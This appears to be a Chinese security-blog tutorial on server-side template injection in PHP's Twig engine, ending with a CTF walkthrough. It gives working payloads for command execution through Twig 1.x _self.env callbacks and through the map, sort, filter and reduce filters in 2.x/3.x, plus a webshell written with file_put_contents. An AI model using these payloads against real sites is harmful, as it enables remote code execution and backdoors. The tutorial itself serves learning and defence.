freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

以Twig模板为例浅学一手SSTI
2021-12-17 13:48:48
所属地 湖南省

什么是SSTI

SSTI:开局一张图,姿势全靠y

1639718532_61bc1e84adef914e3474b.jpg!small


SSTI,即服务器端模板注入(Server-Side Template Injection)

常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。

sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句

SSTI也是如此,不过SSTI是在服务端接收了输入后,将其作为web应用模板内容的一部分,在进行目标编译渲染的过程中,将恶意语句进行了拼接,因此可能造成敏感信息泄露、代码执行、getshell等问题

在这我会简单以常见的Twig模板引擎进行演示,有所遗漏错误,欢迎各位师傅们进行补充纠正

模板引擎

模板是一种提供给程序进行解析的一种语法,从初始数据到实际的视觉表达靠的就是这一项工作所实现的,且这种手段是同时存在于前后端的

常见的模板引擎有

1.php 常用的

Smarty

Smarty算是一种很老的PHP模板引擎了,非常的经典,使用的比较广泛

Twig

Twig是来自于Symfony的模板引擎,它非常易于安装和使用。它的操作有点像Mustache和liquid。

Blade

Blade 是 Laravel 提供的一个既简单又强大的模板引擎。

和其他流行的 PHP 模板引擎不一样,Blade 并不限制你在视图中使用原生 PHP代码。所有 Blade 视图文件都将被编译成原生的 PHP 代码并缓存起来,除非它被修改,否则不会重新编译,这就意味着 Blade基本上不会给你的应用增加任何额外负担。

2.Java 常用的

JSP

这个引擎我想应该没人不知道吧,这个应该也是我最初学习的一个模板引擎,非常的经典

FreeMarker

FreeMarker是一款模板引擎:即一种基于模板和要改变的数据,并用来生成输出文本(HTML网页、电子邮件、配置文件、源代码等)的通用工具。它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。

Velocity

Velocity作为历史悠久的模板引擎不单单可以替代JSP作为JavaWeb的服务端网页模板引擎,而且可以作为普通文本的模板引擎来增强服务端程序文本处理能力。

3.Python 常用的

Jinja2

flask jinja2 一直是一起说的,使用非常的广泛,是我学习的第一个模板引擎

django

django 应该使用的是专属于自己的一个模板引擎,我这里姑且就叫他 django,我们都知道django 以快速开发著称,有自己好用的ORM,他的很多东西都是耦合性非常高的,你使用别的就不能发挥出 django 的特性了

tornado

tornado 也有属于自己的一套模板引擎,tornado 强调的是异步非阻塞高并发

形形的模板引擎为了达到渲染效果,总会对用户输入有所处理,这也就给攻击者提供了道路,尽管模板引擎也会相应提供沙箱机制进行保护,但是也存在沙箱逃逸技术可以进行绕过

攻击思路

找到模板是什么模板引擎,是哪个版本的,然后设法利用模板的内置方法,进行rce、getshell

PHP-Twig

Twig 被许多开源项目使用,比如 Symfony、Drupal8、eZPublish、phpBB、Matomo、OroCRM;许多框架也支持 Twig,比如 Slim、Yii、Laravel 和 Codeigniter 等等。

本地复现可以用composer搭建

  • 在Twig引擎中,我们可以通过下面方法获得一些关于当前应用的信息(虽然经常会被ban就是...)

{{_self}} #指向当前应用{{_self.env}}{{dump(app)}}{{app.request.server.all|join(',')}}

基础语法

模板其实就是一个文本文件,它可以生成我们需要的任何基于文本的格式文件(html、xml、csv等)

它也没有特别的拓展后缀名,.html.xml.twig都可

这里主要讲一些我们在利用时会用到的基础知识

变量

应用程序将变量传入模板中进行处理,变量可以包含你能访问的属性或元素。你可以使用 .来访问变量中的属性(方法或 PHP 对象的属性,或 PHP 数组单元),Twig还支持访问PHP数组上的项的特定语法, foo['bar']

{{ foo.bar }}{{ foo['bar'] }}

全局变量

模板中始终提供以下变量:

  • _self:引用当前模板名称;(在twig1.x和2.x/3.x作用不一)

  • _context:引用当前上下文;

  • _charset:引用当前字符集。

设置变量

可以为代码块内的变量赋值。赋值使用set标签:

{% set foo = 'foo' %}{% set foo = [1, 2] %}{% set foo = {'foo': 'bar'} %}

过滤器

变量可以修改为 过滤器. 过滤器与变量之间用管道符号隔开 (|). 可以链接多个过滤器。一个过滤器的输出应用于下一个过滤器。

下面的示例从 name标题是:

{{ name|striptags|title }}

接受参数的筛选器在参数周围有括号。此示例通过逗号连接列表中的元素:

{{ list|join }}{{ list|join(', ') }}// {{ ['a', 'b', 'c']|join }}// Output: abc// {{ ['a', 'b', 'c']|join('|') }}// Output: a|b|c

若要对代码部分应用筛选器,请使用apply标签:

{% apply upper %}This text becomes uppercase{% endapply %}

过滤器有很多,但是我们常用的一般就mapsortfilterreduce

更多内置过滤器请参考:https://twig.symfony.com/doc/3.x/filters/index.html

控制结构

控制结构是指所有控制程序流的东西-条件句(即 if/elseif/else/ for)循环,以及程序块之类的东西。控制结构出现在 {{% ... %}}

例如,要显示在名为 users使用for标签:

<h1>Members</h1><ul>{% for user in users %}<li>{{ user.username|e }}</li>{% endfor %}</ul>

if标记可用于测试表达式:

{% if users|length > 0 %}<ul>{% for user in users %}<li>{{ user.username|e }}</li>{% endfor %}</ul>{% endif %}

更多 tags 请参考:https://twig.symfony.com/doc/3.x/tags/index.html

函数

在 Twig 模板中可以直接调用函数,用于生产内容。如下调用了 range()函数用来返回一个包含整数等差数列的列表:

{% for i in range(0, 3) %}{{ i }},{% endfor %}// Output: 0, 1, 2, 3,

更多内置函数请参考:https://twig.symfony.com/doc/3.x/functions/index.html

注释

要在模板中注释某一行,可以使用注释语法 {# ...#}

{# note: disabled template because we no longer use this{% for user in users %}...{% endfor %}#}

引入其他模板

Twig 提供的 include函数可以使你更方便地在模板中引入模板,并将该模板已渲染后的内容返回到当前模板

{{ include('sidebar.html') }}

模板继承

Twig最强大的部分是模板继承。模板继承允许您构建一个基本的“skeleton”模板,该模板包含站点的所有公共元素并定义子模版可以覆写的 blocks 块。

从一个例子开始更容易理解这个概念。

让我们定义一个基本模板, base.html,它定义了可用于两列页面的HTML框架文档:

<!DOCTYPE html><html><head>{% block head %}<link rel="stylesheet" href="style.css"/><title>{% block title %}{% endblock %} - My Webpage</title>{% endblock %}</head><body><div id="content">{% block content %}{% endblock %}</div><div id="footer">{% block footer %}&copy; Copyright 2011 by <a href="http://domain.invalid/">you</a>.{% endblock %}</div></body></html>

在这个例子中,block标记定义了子模板可以填充的四个块。所有的 block标记的作用是告诉模板引擎子模板可能会覆盖模板的这些部分。

子模板可能如下所示:

{% extends "base.html" %}{% block title %}Index{% endblock %}{% block head %}{{ parent() }}<style type="text/css">.important { color: #336699; }</style>{% endblock %}{% block content %}<h1>Index</h1><p class="important">Welcome to my awesome homepage.</p>{% endblock %}

其中的 extends标签是关键所在,其必须是模板的第一个标签。extends标签告诉模板引擎当前模板扩展自另一个父模板,当模板引擎评估编译这个模板时,首先会定位到父模板。由于子模版未定义并重写 footer块,就用来自父模板的值替代使用了。

更多 Twig 的语法请参考:https://twig.symfony.com/doc/3.x/

1.x

在twig 1.x版本,存在三个全局变量

  • _self:引用当前模板实例

  • _context:引用上下文

  • _charset:引用当前字符集

其相对应的代码如下

protected $specialVars = ['_self' => '$this','_context' => '$context','_charset' => '$this->env->getCharset()',];

在twig 1.x中,主要利用的是_self变量,它会返回当前 \Twig\Template实例,并提供了指向 Twig_Environmentenv属性,这样我们就可以继续调用 Twig_Environment中的其他方法

payload

{{_self.env.setCache("ftp://ip:port")}}{{_self.env.loadTemplate("backdoor")}}

通过调用setCache方法改变twig加载php的路径,在allow_url_include开启的条件下,我们就可以实现远程文件包含

在getFilter方法中存在call_user_func回调函数,通过传入参数我们可以借此调用任意函数

#getFilterpublic function getFilter($name){...foreach ($this->filterCallbacks as $callback) {if (false !== $filter = call_user_func($callback, $name)) {return $filter;}}return false;}public function registerUndefinedFilterCallback($callable){$this->filterCallbacks[] = $callable;}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}// Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

但以上漏洞都只存在于1.x,在后续版本中,_self只会返回当前实例名字符串



1639718580_61bc1eb4840dafd74516e.png!small


2.x&3.x

在这里我用twig3.x+php7.3.4作为示例

用PHP的API调用twig

index.php

<?phprequire_once "./vendor/autoload.php";$loader = new \Twig\Loader\ArrayLoader(['index' => 'Hello {{ name }}!',]);$twig = new \Twig\Environment($loader);$template = $twig->createTemplate("Hello {$_GET['name']}!");echo $template->render();

在twig2.x/3.x中,_self不再像1.x时那么有他独特的作用,但是也相应更新了一些特殊方法来供我们利用

map过滤器

map

这个 map过滤器将箭头函数应用于序列或映射的元素。arrow函数接收序列或映射的值:

{% set people = [
{first: "Bob", last: "Smith"},
{first: "Alice", last: "Dupond"},
] %}

{{ people|map(p => "#{p.first} #{p.last}")|join(', ') }}
{# outputs Bob Smith, Alice Dupond #}

arrow函数还接收密钥作为第二个参数:

{% set people = {
"Bob": "Smith",
"Alice": "Dupond",
} %}

{{ people|map((last, first) => "#{first} #{last}")|join(', ') }}
{# outputs Bob Smith, Alice Dupond #}

注意arrow函数可以访问当前上下文。

可以看出允许用户传一个arrow 函数,arrow 函数最后会变成一个closure

举个例子

当我们传入

{{["man"]|map((arg)=>"hello #{arg}")}}

在模板中会被编译为

twig_array_map([0 => "id"], function ($__arg__) use ($context, $macros) { $context["arg"] = $__arg__; return ("hello " . ($context["arg"] ?? null))

map所对应的函数如下

function twig_array_map($array $arrow){$r = [];foreach ($array as $k => $v) {$r[$k] = $arrow($v $k);}return $r;}

我们可以看到,传入的 $arrow直接就被当成函数执行,即 $arrow($v, $k),而 $v$k分别是 $array中的 value 和 key

所以$array$arrow都是我们可控的,那我们就可以找到有两个参数的、可以实现命令执行的危险函数来进行rce

经过查询,有如下几种常见命令执行函数

system ( string $command [, int &$return_var ] ) : stringpassthru ( string $command [, int &$return_var ] )exec ( string $command [, array &$output [, int &$return_var ]] ) : stringshell_exec ( string $cmd ) : string

有两个参数的函数就上面三种,其对应payload

{{["whoami"]|map("system")}}{{["whoami"]|map("passthru")}}{{["whoami"]|map("exec")}}    // 无回显


1639718609_61bc1ed10eaf5fa01e0e3.png!small


但是当上面的都被ban了呢,我们还有没有其他方法rce

当然,例如

file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) : int

当我们找到路径后就可以利用该函数进行写shell了

?name={{{"<?php phpinfo();eval($_POST[whoami]);":"D:\\phpstudy_pro\\WWW\\shell.php"}|map("file_put_contents")}}


1639718621_61bc1edd2d5e2c4f00b16.png!small


根据map过滤器的利用思路,我们可以再找到其他类似的,带有$arrow参数的

sort过滤器

sort

这个 sort筛选器对数组排序:

{% for user in users|sort %}
...
{% endfor %}

注解

在内部,Twig使用PHP asort函数来维护索引关联。它通过将可遍历对象转换为数组来支持这些对象。

您可以传递一个箭头函数来对数组进行排序:

{% set fruits = [
{ name: 'Apples', quantity: 5 },
{ name: 'Oranges', quantity: 2 },
{ name: 'Grapes', quantity: 4 },
] %}

{% for fruit in fruits|sort((a, b) => a.quantity <=> b.quantity)|column('name') %}
{{ fruit }}
{% endfor %}

{# output in this order: Oranges, Grapes, Apples #}

注意 spaceship 运算符来简化比较。

类似于map,sort在模板编译时也会进入twig_sort_filter函数

function twig_sort_filter($array, $arrow = null){if ($array instanceof \Traversable) {$array = iterator_to_array($array);} elseif (!\is_array($array)) {throw new RuntimeError(sprintf('The sort filter only works with arrays or "Traversable", got "%s".', \gettype($array)));}if (null !== $arrow) {uasort($array, $arrow);    // 直接被 uasort 调用} else {asort($array);}return $array;}
uasort ( array &$array , callable $value_compare_func ) : bool

可以看到,$array$arrow直接被uasort调用

1639718635_61bc1eeb3774e8c789fed.png!small

uasort会将数组中的元素按照键值进行排序,当我们自定义一个危险函数时,就可能造成rce

1639718646_61bc1ef64f887eecd4af8.png!small

这样我们就可以构造payload了

{{["id", 0]|sort("system")}}{{["id", 0]|sort("passthru")}}{{["id", 0]|sort("exec")}}    // 无回显

filter过滤器

filter

这个 filter过滤器使用箭头函数过滤序列或映射的元素。arrow函数接收序列或映射的值:

{% set sizes = [34, 36, 38, 40, 42] %}

{{ sizes|filter(v => v > 38)|join(', ') }}
{# output 40, 42 #}

for标记,它允许筛选要迭代的项:

{% for v in sizes|filter(v => v > 38) -%}
{{ v }}
{% endfor %}
{# output 40 42 #}

它也适用于映射:

{% set sizes = {
xs: 34,
s: 36,
m: 38,
l: 40,
xl: 42,
} %}

{% for k, v in sizes|filter(v => v > 38) -%}
{{ k }} = {{ v }}
{% endfor %}
{# output l = 40 xl = 42 #}

arrow函数还接收密钥作为第二个参数:

{% for k, v in sizes|filter((v, k) => v > 38 and k != "xl") -%}
{{ k }} = {{ v }}
{% endfor %}
{# output l = 40 #}

注意arrow函数可以访问当前上下文。

类似于map,filter在模板编译时也会进入twig_array_filter函数

function twig_array_filter($array, $arrow){if (\is_array($array)) {return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH);    // $array 和 $arrow 直接被 array_filter 函数调用}// the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iteratorreturn new \CallbackFilterIterator(new \IteratorIterator($array), $arrow);}
array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array

可以看到和前面方法类似,我们实验一下

1639718660_61bc1f04d9f09640f186e.png!small

得到payload

{{["id"]|filter("system")}}{{["id"]|filter("passthru")}}{{["id"]|filter("exec")}}    // 无回显{{{"<?php phpinfo();eval($_POST[whoami]);":"D:\\phpstudy_pro\\WWW\\shell.php"}|filter("file_put_contents")}}    // 和map过滤器一样可以写 Webshell

reduce 过滤器

reduce

这个 reducefilter使用arrow函数迭代地将序列或映射缩减为单个值,从而将其缩减为单个值。arrow函数接收上一次迭代的返回值和序列或映射的当前值:

{% set numbers = [1, 2, 3] %}

{{ numbers|reduce((carry, v) => carry + v) }}
{# output 6 #}

这个 reduce过滤器需要 initial值作为第二个参数:

{{ numbers|reduce((carry, v) => carry + v, 10) }}
{# output 16 #}

注意arrow函数可以访问当前上下文。

直接来看函数

function twig_array_reduce($array, $arrow, $initial = null){if (!\is_array($array)) {$array = iterator_to_array($array);}return array_reduce($array, $arrow, $initial);    // $array, $arrow 和 $initial 直接被 array_reduce 函数调用}
array_reduce ( array $array , callable $callback [, mixed $initial = NULL ] ) : mixed

可以看到array_reduce是有三个参数的

$array$arrow直接被 array_filter函数调用,我们可以利用该性质自定义一个危险函数从而达到rce

1639718690_61bc1f221e1888e8f8325.png!small

刚开始还是像前面一样构造

{{["id", 0]|reduce("passthru")}}

但是发现没有执行成功,原因是第一次调用的是

passthru($initial, "id")

因为$initial为null,所以会报错,我们想要对他进行赋值才行

payload

{{[0, 0]|reduce("system", "id")}}{{[0, 0]|reduce("passthru", "id")}}{{[0, 0]|reduce("exec", "id")}}    // 无回显

题目

  • [BJDCTF2020]Cookie is so stable

进入发现一个flag按钮和一个hint按钮点击hint发现源码有hint

1639718736_61bc1f5059ba75535a227.png!small

返回访问flag.php

经过简单测试猜测为twig(传入{{7*'7'}}后Jinja2输出7777777,Twig输出49

1639718747_61bc1f5b30c8fbe7fe0e5.png!small


1639718757_61bc1f656591f21cc3db1.png!small


同时发现在cookie是我们的输入点,开始查看是什么版本的twig,用_self来测试

cookieuser:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}


1639718774_61bc1f768f4da35b1cb69.png!small


twig1.x,我们直接cat /flag试试

cookieuser:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}


1639718789_61bc1f8540d58fe1cb3b4.png!small


基本思路还是测试出为哪个模板,哪个版本,测试payload即可

后言

SSTI 并不广泛存在,但如果开发人员滥用模板引擎,那么就很有可能出现SSTI,并且根据其模板引擎的复杂性和开发语言的特性,很大几率会出现非常严重的问题

联想到最近的log4j2漏洞,与SSTI类似,都是将用户的输入当作可信任内容,这才出现了大大小小的安全问题

一句话总结:永远不要相信用户的输入


# web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录